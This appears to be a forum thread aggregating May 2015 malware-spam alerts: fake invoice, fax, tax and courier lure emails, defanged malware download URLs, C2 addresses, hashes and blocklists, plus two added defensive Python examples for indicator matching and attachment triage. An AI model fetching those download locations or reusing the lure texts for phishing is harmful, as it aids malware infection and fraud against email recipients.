Current Virus total detections: 8/57** . This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/8eaf6470216985909ceb03446974f96cd5b518d7a79e894dbb5735776f2ff73a/analysis/1431355859/
** https://www.virustotal.com/en/file/67f2feb4026bdea28095b0c73fe91e833e4e2557f9796b087f759ad9a87d13d6/analysis/1431358936/
... Behavioural information
TCP connections
104.130.28.231: https://www.virustotal.com/en/ip-address/104.130.28.231/information/
91.211.17.201: https://www.virustotal.com/en/ip-address/91.211.17.201/information/
67.219.166.113: https://www.virustotal.com/en/ip-address/67.219.166.113/information/
88.221.14.249: https://www.virustotal.com/en/ip-address/88.221.14.249/information/
___
Fake 'Payment details' SPAM - doc malware attachment
- http://blog.dynamoo.com/2015/05/malware-spam-payment-details-and-copy.html
11 May 2015 - "... using the analysis of an anonymous source (thank you)..
From: Kristina Preston [Kerry.df@ qslp .com]
Date: 11 May 2015 at 12:56
Subject: Payment details and copy of purchase [TU9012PM-UKY]
Dear [redacted]
On 08/05/15 you have requested full payment details and copy of purchase. Please refer to document in the attachment.
Any queries? Please reply back with your questions and you will receive a prompt and qualitative response as soon as possible. Please do not hesitate to write us.
Kristina Preston
Brewin Dolphin
The names and references -change- between different versions, but in all cases there is a malicious DOC file attached. This DOC has an unusual structure in that it is some sort of MIME file containing a mixture of HTML and Base64-encoded segments... the source's analysis shows that this downloads a VBS file from Pastebin... which then downloads some sort of .NET binary from 91.226.93[.]14:8080/stat/get.php (Sobis, Russia). This binary has a detection rate of 2/56* and according to automated analysis tools... it communicates with:
46.36.217.227 (FastVPS, Estonia)
It also drops a DLL with an MD5 of f0d261147d2696253ab893af3d125f53 and a detection rate of 1/56**.
Recommended blocklist:
46.36.217.227
91.226.93.14 "
* https://www.virustotal.com/en/file/ad5da98892fd9ce4b15adbce4645228a8bc63ab5aa7f7361f3e853caf43e1098/analysis/1431349548/
... Behavioural information
TCP connections
46.36.217.227: https://www.virustotal.com/en/ip-address/46.36.217.227/information/
88.221.14.249: https://www.virustotal.com/en/ip-address/88.221.14.249/information/
** https://www.virustotal.com/en/file/565366fc6d1cce5fb5e0d31e2726d6ebc6d48f2f5d2dcc7c7bf3f1e675b1def8/analysis/
- http://blog.mxlab.eu/2015/05/11/fake-email-payment-details-and-copy-of-purchase-random-contains-mailicious-word-file/
May 11, 2015
- https://www.virustotal.com/en/file/4fd4a17600edead52b9a0d401b467e233f52aaba68ec577998a11ac29eb66762/analysis/
Detection ratio: 1/56
Analysis date: 2015-05-11 14:33:59 UTC
___
Fake 'Fiserv' SPAM - zip malware attached
- http://blog.mxlab.eu/2015/05/11/fake-email-fiserv-secure-email-notification-8715217-contains-upatre-trojan/
May 11, 2015 - "... intercepted a new trojan distribution campaign by email with the subject 'Fiserv Secure Email Notification – 8715217'. This email is sent from the -spoofed- address “Fiserv Secure Notification <secure.notification@ fiserv .com>” and has the following body:
You have received a secure message
Read your secure message by opening the attachment, SecureFile.zip.
The attached file contains the encrypted message that you have received.
To read the encrypted message, complete the following steps:
– Double-click the encrypted message file attachment to download the file to your computer.
– Select whether to open the file or save it to your hard drive. Opening the file displays the attachment in a new browser window.
To access from a mobile device, forward this message to mobile@ res .fiserv .com to receive a mobile login URL.
If you have concerns about the validity of this message, please contact the sender directly. For questions about secure e-mail encryption service, please contact technical support at 888.362.9972.
2000-2015 Fiserv Secure Systems, Inc. All rights reserved.
The attached file SecureFile8715217.zip contains the 37 kB file SecureFile.exe. The trojan is known as Virus.Win32.Heur.c, W32/Upatre.E3.gen!Eldorado, UDS:DangerousObject.Multi.Generic or Trojan.Win32.Qudamah.Gen.5. At the time of writing, 8 of the 56 AV engines detected the trojan at Virus Total*..."
* https://www.virustotal.com/en/file/a14ee4362b3fa3c6c0836d036563ff9d42b95269b3a9de29a9dd999c7caa45f6/analysis/
File name: SecureFile.vxe
Detection ratio: 9/56
Analysis date: 2015-05-11 15:01:00 UTC
___
"Breaking Bad" themed ransomware - Fake PDF attachment ...
- http://net-security.org/malware_news.php?id=3035
11.05.2015 - "A new type of ransomware is targeting Australian users, and its creators have decided to have some fun and express their love for the popular US TV show 'Breaking Bad' while trying to 'earn' some money:
> http://www.net-security.org/images/articles/lospollos-11052015.jpg
It encrypts the usual assortment of file types - images, documents, audio and video files, archive and database files - with a random Advanced Encryption Standard (AES) key, which is then encrypted with an RSA public key. 'The malware arrives through a malicious zip archive, which uses the name of a major courier firm in its file name. This zip archive contains a malicious file called PENALTY.VBS, which when executed, downloads the crypto ransomware onto the victim’s computer. The threat also downloads and opens a legitimate .pdf file to trick users into thinking that the initial zip archive was not a malicious file' Symantec researchers shared:
> http://www.symantec.com/connect/app#!/blogs/breaking-bad-themed-los-pollos-hermanos-crypto-ransomware-found-wild
>> http://www.symantec.com/security_response/writeup.jsp?docid=2015-050723-5132-99
The crooks ask for the -ransom- to be paid in Bitcoin, and instruct victims on how to do this via a legitimate YouTube tutorial... the malware can be pretty damaging. The best protection against this type of destructive malicious software is to back up important files regularly."
>> http://www.symantec.com/connect/app#!/blogs/ransomware-how-stay-safe
___
Xerox Fax Spam
- http://threattrack.tumblr.com/post/118696783723/xerox-fax-spam
May 11, 2015 - "Subjects Seen:
You have received a new fax
Typical e-mail details:
You have received fax from XEROX23685428 at <email domain>
Scan date: Mon, 11 May 2015 15:40:57 +0100
Number of page(s): 29
Resolution: 400x400 DPI
Name: Fax3516091
Malicious File Name and MD5:
IncomingFax.exe (c6c2d72f2b36e854f51ff92680969918)
Tagged: Xerox, Upatre
___
Compromised .gov redirects to Apple ID Phish
- https://blog.malwarebytes.org/fraud-scam/2015/05/compromised-gov-redirected-to-apple-id-phish/
May 11 2015 - "... a .gov .vn URL which was redirecting to a -phishing- expedition for Apple IDs... the email which sported a particularly French flavour:
> https://blog.malwarebytes.org/wp-content/uploads/2015/05/applephish1.jpg
... victim was sent to: skintesting(dot)com(dot)au/components/com_mailto/views/sent/tmpl/auth/
which looked like yet another compromised domain, asking for Apple login credentials:
> https://blog.malwarebytes.org/wp-content/uploads/2015/05/applephish3.jpg
... A .gov site is always going to be a juicy target for scammers so it’s crucial Admins keep everything patched and up to date – tracking back to where and how an attacker got in can be a long, arduous process. As for Apple ID owners, always -verify- you’re on the correct page before entering login details. Unless you specifically asked Apple to send you a link for some reason (a password reset, for example) then you should -avoid- random URLs sent your way*..."
* https://www.apple.com/uk/support/appleid/security/
skintesting .com .au: 192.185.109.233: https://www.virustotal.com/en/ip-address/192.185.109.233/information/
:fear::fear: :mad:
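Added example, not code from Dynamoo, MyOnlineSecurity, mxlab or VirusTotal: the indicators in these posts are defanged in several styles ("pastebin[.]com", "91.226.93[.]14:8080/...", "http ://wesleychristianschool .org/43/83.exe", "confirm-identity(dot)me(dot)ma"). The code below refangs them, pulls out the host, and runs a proxy log against those hosts plus Dynamoo's recommended blocklist (entries may be single addresses or CIDR ranges). The log format, the 10.0.0.x client addresses and the RFC 5737 destination addresses for benign traffic are constructed for the example; the indicator strings themselves are copied from the posts above.

```python
"""Refang thread-style indicators and match a proxy log against them plus a
CIDR-aware blocklist. Added example; log lines are constructed, not real traffic."""
import ipaddress
import re
from typing import Iterable, List, Set, Tuple
from urllib.parse import urlsplit


def refang(indicator: str) -> str:
    """Undo the defanging conventions used in the posts above."""
    s = indicator.strip()
    s = s.replace("[.]", ".").replace("(dot)", ".").replace("[:]", ":")
    s = re.sub(r"^hxxp", "http", s, flags=re.I)
    s = re.sub(r"\s+(?=[.:/])", "", s)   # "http ://host .tld" -> "http://host.tld"
    return s


def host_of(indicator: str) -> str:
    """Host part (lower-case, no scheme, port or path) of a URL, host or IP."""
    s = refang(indicator)
    if "://" not in s:
        s = "http://" + s
    return (urlsplit(s).hostname or "").lower()


# Indicators as they appear in the posts above (still defanged).
IOCS = [
    "hmcomercial .com.br/75/47.exe",
    "http ://wesleychristianschool .org/43/83.exe",
    "pastebin[.]com/download.php?i=5K5YLjVu",
    "91.226.93[.]14:8080/stat/get.php",
    "confirm-identity(dot)me(dot)ma",
]
BLOCKLIST = ["46.36.217.227", "91.226.93.14"]   # Dynamoo's recommended blocklist

# Constructed log format: timestamp client method url status destination-ip
LOG_RE = re.compile(r"^(?P<ts>\S+) (?P<client>\S+) (?P<method>[A-Z]+) "
                    r"(?P<url>\S+) (?P<status>\d{3}) (?P<dst>\S+)$")

Hit = Tuple[int, str, str]   # (line number, client, reason)


def scan_log(lines: Iterable[str], iocs: Iterable[str], blocklist: Iterable[str]) -> List[Hit]:
    hosts = {host_of(i) for i in iocs}
    nets = [ipaddress.ip_network(b, strict=False) for b in blocklist]
    hits: List[Hit] = []
    for n, line in enumerate(lines, 1):
        m = LOG_RE.match(line)
        if not m:
            continue   # unparseable line; in production, count these
        host = (urlsplit(m["url"]).hostname or "").lower()
        if host in hosts:
            hits.append((n, m["client"], f"ioc host {host}"))
        try:
            dst = ipaddress.ip_address(m["dst"])
        except ValueError:
            continue
        if any(dst in net for net in nets):
            hits.append((n, m["client"], f"blocklisted {dst}"))
    return hits


def suspect_clients(hits: Iterable[Hit]) -> Set[str]:
    """Internal hosts worth pulling for the infection chain described above."""
    return {client for _, client, _ in hits}


SAMPLE_LOG = [  # constructed; benign destinations use RFC 5737 addresses
    "2015-05-11T12:57:01Z 10.0.0.15 GET http://pastebin.com/download.php?i=5K5YLjVu 200 203.0.113.10",
    "2015-05-11T12:57:04Z 10.0.0.15 GET http://91.226.93.14:8080/stat/get.php 200 91.226.93.14",
    "2015-05-11T12:57:20Z 10.0.0.15 POST http://46.36.217.227/ 200 46.36.217.227",
    "2015-05-11T13:02:11Z 10.0.0.22 GET http://www.example.org/index.html 200 198.51.100.5",
]

if __name__ == "__main__":
    found = scan_log(SAMPLE_LOG, IOCS, BLOCKLIST)
    for n, client, why in found:
        print(f"line {n}: {client}: {why}")
    print("suspect clients:", sorted(suspect_clients(found)))
```

The three hits on 10.0.0.15 line up with the chain Dynamoo describes (VBS from Pastebin, binary from 91.226.93.14:8080, then C2 on 46.36.217.227), which is the pattern to look for in your own proxy history rather than any single indicator.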
AplusWebMaster
2015-05-12, 13:25
FYI...
Fake 'invoice' SPAM - doc/xls malware
- http://myonlinesecurity.co.uk/copy-of-your-123-reg-invoice-123-015309323-word-doc-or-excel-xls-spreadsheet-malware/
12 May 2015 - "'Copy of your 123-reg invoice ( 123-015309323 )' pretending to come from no-reply@ 123-reg .co .uk with a malicious word doc or Excel XLS spreadsheet attachment is another one from the current bot runs...
Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2015/05/Copy-of-your-123-reg-invoice-123-015309323-.png
12 May 2015 : 123-reg-invoice.doc - Current Virus total detections: 5/57*
... this particular macro downloads greenmchina .com/432/77.exe (VirusTotal**); other macros will download the same malware from other locations... Other download locations so far are:
http ://hydrocapital .com/432/77.exe
http ://fosteringmemories .com/432/77.exe
http ://k-insects .com/432/77.exe
http ://andrewachsen .com/432/77.exe
... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/4baef401edc96a5e777724dbfded6ad5536f5badc88ec8f9c42c8dc35d201ba8/analysis/1431420411/
** https://www.virustotal.com/en/file/8169820dc63b4f72564524f78dd73baad3dcb6f05518d55a01e08d268b612da7/analysis/1431420983/
... Behavioural information
TCP connections
37.143.15.116: https://www.virustotal.com/en/ip-address/37.143.15.116/information/
5.178.43.49: https://www.virustotal.com/en/ip-address/5.178.43.49/information/
- http://blog.dynamoo.com/2015/05/malware-spam-copy-of-your-123-reg.html
12 May 2015
"... Recommended blocklist:
37.143.15.116
62.152.36.90
89.28.83.228
185.15.185.201 "
___
Fake 'contract' SPAM - PDF malware
- http://myonlinesecurity.co.uk/city-of-port-arthur-storm-sewer-project-fake-pdf-malware/
12 May 2015 - "'CITY OF PORT Arthur – STORM SEWER Project' coming from random names and random email addresses with a zip attachment is another one from the current bot runs... The email looks like:
Please see attachment for contract. Please sign and return.
Thanks
Fred Stepp – Office Manager
McInnis Construction, Inc.,
675 South 4th Street
Silsbee, Texas 77656
email: fred@ mcinnisprojects .com
Phone: 409-385-5767
Fax: 409-385-2483
12 May 2015: m7Tfq4u1cS5i.zip: Extracts to: contract_DGSASGQ34G_erwr.exe
Current Virus total detections: 23/55*. This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/686802c0e504ee17b8c225ef1fa195d76e84ba9483e1eb5e5f540430ab119705/analysis/1431424842/
___
Fake 'Outstanding Invoices' SPAM - malicious attachment
- http://blog.dynamoo.com/2015/05/malware-spam-attn-outstanding-invoices.html
12 May 2015 - "This -spam- comes with random senders and reference numbers, but in all cases includes a malicious attachment:
From: Debbie Barrett
Date: 12 May 2015 at 11:14
Subject: ATTN: Outstanding Invoices - [4697E0] [April|May]
Dear anthony,
Kindly find attached our reminder and copy of the relevant invoices.
Looking forward to receive your prompt payment and thank you in advance.
Kind regards
The attachment name combines the recipient's email address with the -fake- reference number, e.g. barry_51DDAF.xls which isn't actually an Excel file at all, but a multipart MIME file. Payload Security's Hybrid Analysis tool* manages to analyse it though, showing several steps in the infection chain. First a VBScript is downloaded from pastebin[.]com/download.php?i=5K5YLjVu
Secondly, that VBScript then downloads a file from 92.63.88[.]87:8080/bt/get.php (MWTV, Latvia) which is saved as crypted.120.exe, this has a detection rate of 2/57.**
This component then connects to 46.36.217.227 (FastVPS, Estonia) and according to this Malwr report drops a Dridex DLL with a detection rate of 3/56***. There are several different attachments... Recommended blocklist:
92.63.88.0/24
46.36.217.227 "
* https://www.hybrid-analysis.com/sample/ec833c13eea0555cfc2c8b8824537b6ce0deef609b0d8fb04f37894a746c472c?environmentId=4
** https://www.virustotal.com/en/file/da0d74b7f5311b41225a925270a00a41c639b0fec3f8ec3008b4f08afe805df8/analysis/1431431603/
*** https://www.virustotal.com/en/file/97d53bbcf96e42d9fba1e82c55a8a55cb3026cb7ade847630b608e6f0ee72772/analysis/1431432524/
___
Australian Tax Office Spam
- http://threattrack.tumblr.com/post/118777840043/australian-tax-office-spam
May 12, 2015 - "Subjects Seen:
Australian Taxation Office - Refund Notification
Typical e-mail details:
IMPORTANT NOTIFICATION
Australian Taxation Office - 12/05/2015
After the last calculation of your fiscal activity we have determined that you are eligible to receive a refund of 0736.22 AUD.
For more details please follow the steps bellow :
- Right-click the link on the attachment name, and select Save Link As, Save Target As or a similar option provided.
- Select the location into which you want to download the file and choose Save.
- Unzip the attached file.
Iris Simmons,
Tax Refund Department
Australian Taxation Office
Malicious File Name and MD5:
ATO_TAX_724491.exe (3da854cd500c3cb5b86df19e151503cc)
Tagged: ATO, Upatre
:fear::fear: :mad:
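Added example, written for this thread and not taken from myonlinesecurity, Dynamoo or ThreatTrack: the same three attachment tricks keep coming up in these posts, an .exe carrying a PDF or MP3 icon inside a zip (spotted only if "show known file extensions" is on), a zip nested inside a zip, and a .doc/.xls that is really a multipart MIME (MHTML) text file, as with barry_51DDAF.xls. The mail-gateway triage below judges each attachment by its leading bytes and by every dotted suffix in its name rather than by the icon, and recurses into nested archives. The member names are taken from this thread; the archive contents are constructed in memory (a bare "MZ" stub and a short MIME header) and are not real samples.

```python
"""Triage mail attachments the way the posts in this thread describe them:
an .exe with a PDF/MP3 icon inside a zip, a zip nested in a zip, and a
.doc/.xls that is really MIME text. Added example; archives are built in
memory from constructed bytes, not real samples."""
import io
import re
import zipfile
from typing import Dict, List, Tuple

EXEC_EXT = {".exe", ".scr", ".pif", ".com", ".bat", ".cmd", ".js", ".jse",
            ".vbs", ".vbe", ".wsf", ".hta", ".cpl"}
LURE_EXT = {".pdf", ".doc", ".docx", ".xls", ".xlsx", ".mp3", ".txt", ".jpg"}
OFFICE_EXT = {".doc", ".docx", ".xls", ".xlsx", ".docm", ".xlsm"}
OOXML_EXT = {".docx", ".xlsx", ".docm", ".xlsm"}   # legitimately zip containers
Finding = Tuple[str, str]                           # (member path, what was found)


def sniff(data: bytes) -> str:
    """Cheap content-type guess from the leading bytes."""
    if data.startswith(b"MZ"):
        return "pe"
    if data.startswith(b"PK\x03\x04"):
        return "zip"
    if data.startswith(b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1"):
        return "ole2"          # legacy binary .doc/.xls
    if data.startswith(b"%PDF"):
        return "pdf"
    if re.match(rb"\s*(MIME-Version:|Content-Type:|From:)", data[:64], re.I):
        return "mime"          # MHTML masquerading as an Office file
    return "unknown"


def extensions(name: str) -> List[str]:
    """All dotted suffixes, lower-cased; padding spaces/underscores are
    tolerated so 'montag.mp3 _____.exe' -> ['.mp3', '.exe']."""
    base = name.rsplit("/", 1)[-1]
    return [m.group(0).lower()
            for m in re.finditer(r"\.[A-Za-z0-9]{1,5}(?=[\s_]|$)", base)]


def is_archive(name: str, data: bytes) -> bool:
    exts = extensions(name)
    return sniff(data) == "zip" and (exts[-1] if exts else "") not in OOXML_EXT


def triage_member(name: str, data: bytes) -> List[str]:
    exts = extensions(name)
    last = exts[-1] if exts else ""
    kind = sniff(data)
    findings: List[str] = []
    if last in EXEC_EXT:
        findings.append(f"executable extension {last}")
    if len(exts) > 1 and last in EXEC_EXT and exts[-2] in LURE_EXT:
        findings.append(f"double extension {exts[-2]}{last}")
    if kind == "pe" and last not in EXEC_EXT:
        findings.append(f"PE header behind {last or 'no'} extension")
    if last in OFFICE_EXT and kind == "mime":
        findings.append("Office name but MIME/MHTML content")
    return findings


def triage_archive(data: bytes, prefix: str, depth: int = 0, max_depth: int = 3) -> List[Finding]:
    """Walk a zip, recursing into nested zips up to max_depth."""
    if depth > max_depth:
        return [(prefix, f"nesting deeper than {max_depth}")]
    results: List[Finding] = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            path = prefix + info.filename
            member = zf.read(info)
            if is_archive(info.filename, member):
                results.append((path, "nested archive"))
                results.extend(triage_archive(member, path + "!/", depth + 1, max_depth))
            else:
                results.extend((path, f) for f in triage_member(info.filename, member))
    return results


def triage_attachment(name: str, data: bytes) -> List[Finding]:
    if is_archive(name, data):
        return triage_archive(data, name + "!/")
    return [(name, f) for f in triage_member(name, data)]


def triage_all(attachments: Dict[str, bytes]) -> Dict[str, List[Finding]]:
    return {name: triage_attachment(name, data) for name, data in attachments.items()}


def build_zip(members: Dict[str, bytes]) -> bytes:
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_STORED) as zf:
        for name, data in members.items():
            zf.writestr(name, data)
    return buf.getvalue()


FAKE_PE = b"MZ" + b"\x00" * 126   # constructed: only the DOS magic, not a real binary
FAKE_MHTML = (b"MIME-Version: 1.0\r\nContent-Type: multipart/related; "
              b"boundary=\"----=_part\"\r\n\r\n------=_part\r\nAAAA\r\n")
MP3_NAME = "montag.mp3 _______________________________________.exe"

SAMPLES: Dict[str, bytes] = {   # names from this thread, contents constructed
    "PutkTvy9XAf.zip": build_zip({"Fax_wqe32rq2vgwb_data.exe": FAKE_PE}),
    "72katheryne.zip": build_zip({MP3_NAME: FAKE_PE}),
    "BANK DETAILS.zip": build_zip({"PO#0001BH04_20_15.zip":
                                   build_zip({"PO#0001BH04_20_15.exe": FAKE_PE})}),
    "barry_51DDAF.xls": FAKE_MHTML,
}

if __name__ == "__main__":
    for name, findings in triage_all(SAMPLES).items():
        for path, what in findings:
            print(f"{name}: {path}: {what}")
```

The point of judging by bytes and by every suffix is that the icon is under the attacker's control and the last extension is hidden by default on Windows; a gateway rule that quarantines anything with an executable suffix or a PE header inside an archive, and any Office-named attachment that is really MIME text, would have caught every attachment listed in these posts.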
AplusWebMaster
2015-05-13, 13:59
FYI...
Fake 'WhatsApp audio letter' SPAM – mp3 malware
- http://myonlinesecurity.co.uk/whatsapp-you-just-accepted-an-audio-letter-v8p-fake-mp3-malware/
13 May 2015 - "'You just accepted an audio letter! v8p' pretending to come from WhatsApp with a zip attachment is another one from the current bot runs... The email looks like:
Savion Dale
13 May 2015: 72katheryne.zip : Extracts to: montag.mp3 _______________________________________.exe
Current Virus total detections:15/55* . This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper mp3 file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/93aa2f7eda535abb50198e4e2fe474c27d696ece9972c38c8f7db24146d1f55b/analysis/1431496654/
___
Fake 'PAYMENT ACCOUNT DETAILS' SPAM - malware
- http://myonlinesecurity.co.uk/payment-account-details-confirmation-of-67000-malware/
13 May 2015 - "'PAYMENT ACCOUNT DETAILS CONFIRMATION OF $67,000' pretending to come from jimmy cliff <jimmycliff2015@ hotmail .com> (email headers show that this does appear to be coming via Hotmail, so we have to assume a hacked/compromised Hotmail account) with a zip attachment is another one from the current bot runs... The email looks like:
Dear Sir
Please, confirm your bank details in your invoice before we proceed with
your payment to avoid mistakes that can lead to delay.
Best Regards,
Afraa Shaymaa Maloof
PURHASING MANAGER
mediondirect INT.
708 N VALLEY ST STE C
ANAHEIM CA 92801-3837
Today's Date: BANK DETAILS.zip (1,288,813 bytes): Extracts to: PO#0001BH04_20_15.zip
... which in turn extracts to PO#0001BH04_20_15.exe - Current Virus total detections: 21/56*
The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/d3cce03fae7985afb9e66352bf16cd97adece416834844a2e6f6034b182ab5b9/analysis/1431502495/
___
Fake 'Invoice #00044105' SPAM – doc/xls malware
- http://myonlinesecurity.co.uk/invoice-00044105-from-deluxebase-ltd-word-doc-or-excel-xls-spreadsheet-malware/
13 May 2015 - "'Invoice #00044105; From Deluxebase Ltd' pretending to come from Anna <anna@ deluxebase .com> with a malicious word doc or Excel XLS spreadsheet attachment is another one from the current bot runs... The email looks like:
Hello
Thank you for your order which has been dispatched, please find an invoice for the goods attached.
Please contact us immediately if you are unable to detach or download your Invoice.
As a valued customer we look forward to your continued business.
Regards
Accounts Department
Deluxebase Ltd ...
13 May 2015 : ESale.doc - Current Virus total detections: 5/55*
... which downloads sundialcompass .com/58/39.exe (VirusTotal**); other versions of these macros will download from other locations. They will all be the same malware.
Other download locations so far discovered are:
http ://fundacionsidom .com .ar/58/39.exe | http ://cartermccrary .com/58/39.exe |
http ://clin .cn/58/39.exe ...
The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/98ac338c46ce0e4686a3b4e75f39f29ad4e4903cfba3d41cd0402a0f9e5f51e8/analysis/1431505840/
** https://www.virustotal.com/en/file/d958ceed05ea399726d081aa48eeea7e3af164dba39ed8c26e7376343189b385/analysis/1431506138/
... Behavioural information
TCP connections
37.143.15.116: https://www.virustotal.com/en/ip-address/37.143.15.116/information/
88.221.14.249: https://www.virustotal.com/en/ip-address/88.221.14.249/information/
___
Fake 'INVOICE No.517-01' SPAM - PDF malware
- http://myonlinesecurity.co.uk/invoice-no-517-01-for-work-at-crystal-beach-fake-pdf-malware/
13 May 2015 - "'INVOICE No. 517-01 FOR WORK AT CRYSTAL BEACH' coming from random names and random email addresses with a zip attachment is another one from the current bot runs... The email looks like:
in the attachment
13 May 2015: OX6qoPp98h48.zip: Extracts to: scan_32r23rf234gt34_3424ef.exe
Current Virus total detections: 2/56*. This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/2050280dd1341b559f9dfea0dc9f0598e7fb69e123dee3bb6eb7698160f63787/analysis/1431513162/
___
Fake 'Financial info' SPAM – doc/xls malware
- http://myonlinesecurity.co.uk/financial-information-word-doc-or-excel-xls-spreadsheet-malware/
13 May 2015 - "An email with the subject of 'Financial information' or 'Important information' or 'Need your attention, Important notice' coming from random names and random email addresses with a malicious word doc or Excel XLS spreadsheet attachment that is named after the email recipient is another one from the current bot runs... The email looks like:
Good morning
Please find attached a remittance advice, relating to a payment made to you.
Many thanks
Regards,
Madeline Mosley
Seniour Finance Assistant
-Or-
Good Afternoon,
We have received a payment from you for the sum of £ 670. Please would you provide me with a remittance, in order for me to reconcile the statement.
I will be sending you a statement of outstanding invoices tomorrow, the total amount outstanding is £ 1515 less the £3254.00 received making a total outstanding of £ 845. We would very much appreciate settlement of this.
As previously mentioned, we changed entity to a limited company on 1st December 2014. We are keen to close all the old accounts down, for both tax and year end reasons. We would be very grateful in your assistance in settling the outstanding.
If you need any copy invoices please do not hesitate to contact us
Regards,
Victoria Barnett
-Or-
Good Afternoon,
Please see attached the copy of the remittance.
Please can you send a revised statement so we can settle any outstanding balances.
Kind Regards,
Ingrid Hammond
13 May 2015: ron.schorr_AD8441271C40.doc | xerox.device1_D9A263380D.doc
Current Virus total detections: 0/56* | 0/56** both macros eventually download 91.226.93.110/bt/get1.php which is saved as crypted.120.exe (virus Total***) after going through a download from pastebin which gives the download location in encoded form... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/c3c9719bf550a1ec5dddfd15af406b4176c026382fceb272da6301eb05b81ba7/analysis/1431512840/
** https://www.virustotal.com/en/file/bdbd7de4976ba29bb7a72da0b3aea9ccbe55b47b3e130fdef5b06162a4fd048b/analysis/1431512565/
*** https://www.virustotal.com/en/file/dd128459932149be4306fef15bc543c9b1f165a45a69e5e8de1f1f7726122a58/analysis/1431512119/
... Behavioural information
TCP connections
159.253.20.116: https://www.virustotal.com/en/ip-address/159.253.20.116/information/
88.221.15.80: https://www.virustotal.com/en/ip-address/88.221.15.80/information/
91.226.93.110: https://www.virustotal.com/en/ip-address/91.226.93.110/information/
- http://blog.dynamoo.com/2015/05/malware-spam-need-your.html
13 May 2015
"... Recommended blocklist:
46.36.217.227
91.226.93.110 "
___
Fake 'ACH' SPAM - PDF malware
- http://myonlinesecurity.co.uk/ach-bank-account-information-form-fake-pdf-malware-2/
13 May 2015 - "'ACH – Bank account information form' pretending to come from Kris Longoria <Kris.Longoria@ jpmchase .com> with a zip attachment is another one from the current bot runs... The email looks like:
Please fill out and return the attached ACH form along with a copy of a voided check.
Kris Longoria,
JPMorgan Chase
GRE Project Accounting
Vendor Management & Bid/Supervisor...
13 May 2015: Check_Copy_Void.zip: Extracts to: Check_Copy_Void.scr
Current VirusTotal detections: 9/55*. This is another one of the spoofed icon files that unless you have "show known file extensions enabled", will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/936b982f7daa45b0071f7ac77f67d8dd1a87cd157d9ca998b9a74c1143163fbd/analysis/1431533270/
___
Fake 'Bond Alternative' SPAM - PDF malware
- http://myonlinesecurity.co.uk/surety-bond-alternative-chs-surety-fake-pdf-malware/
13 May 2015 - "'Surety Bond Alternative' coming from random names and email addresses with a random named zip attachment is another one from the current bot runs...
Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2015/05/Surety-Bond-Alternative.png
12 May 2015: XwJ4IR8V0F1ar.zip: Extracts to: invoice_ghrt6h65h_fwefw3.exe
Current VirusTotal detections: 2/56* (one example only, all these have different sha256 # and a random selection of file names). This is another one of the spoofed icon files that unless you have "show known file extensions enabled", will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/376ac2fa286ae1fad7af5073bb360f610c54d25b6f0977280b597a3d6b80cd33/analysis/1431536544/
___
Dyre Botnet using malicious Word Macros
- http://www.threattracksecurity.com/it-blog/dyre-botnet-using-malicious-microsoft-word-macros/
May 11, 2015 - "The Dyre group, a major malware spam producer, has changed their initial malware dropper to utilize Microsoft Word document -macros- instead of the usual executable types, such as .exe files contained in a .zip. Dyre’s Hedsen spambot*, responsible for the bulk of Upatre emails we’ve been tracking, now uses a template to send infected-macro Word files as spam attachments in hopes that the end user will click the attached .doc file and infect their system. This is a noticeable change in behavior for this particular spambot. As always, users should -disable- Macros in Office documents, and avoid the temptation to open suspicious attachments..."
> http://www.threattracksecurity.com/it-blog/wp-content/uploads/2015/05/Macro.jpg
* http://www.threattracksecurity.com/it-blog/dyre-now-using-signed-certificates-https/
"... Dyre was increasing its target range and altering the type of spambots it uses..."
** http://www.threattracksecurity.com/it-blog/dyre-targets-more-websites/
:fear::fear: :mad:
AplusWebMaster
2015-05-15, 12:28
FYI...
Fake 'Self Bill' SPAM - doc/xls malware
- http://myonlinesecurity.co.uk/reliance-scrap-metal-self-bill-sb026336-attached-word-doc-or-excel-xls-spreadsheet-malware/
15 May 2015 - "'Self Bill SB026336 Attached' pretending to come from Reliance Scrap Metal <enquiries@ reliancescrapmetal .com> with a malicious word doc or Excel XLS spreadsheet attachment is another one from the current bot runs... The email looks like:
Please Find Enclosed Self Bill Number SB026336 Dated 07/05/2015
C Phillips
enquiries@ reliancescrapmetal .com
15 May 2015 : Attachment.doc - Current Virus total detections: 0/56* which downloads bwsherwood .com/34/140.exe (VirusTotal**). There will be other download locations... All locations will deliver the same malware... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/ac9ed15b125fd785ee42419f80017701f08ab7d06adbbf46cf74081a3666c72d/analysis/1431678745/
** https://www.virustotal.com/en/file/dafb9fbd4ef5b046fee44a21460ada8b5cc8079f8b84fee275a29b01097bd715/analysis/1431677370/
... Behavioural information
TCP connections
151.236.216.254: https://www.virustotal.com/en/ip-address/151.236.216.254/information/
88.221.15.80: https://www.virustotal.com/en/ip-address/88.221.15.80/information/
bwsherwood .com: 69.49.101.51: https://www.virustotal.com/en/ip-address/69.49.101.51/information/
___
Fake email Invoices April 2015 with attached malicious Word file
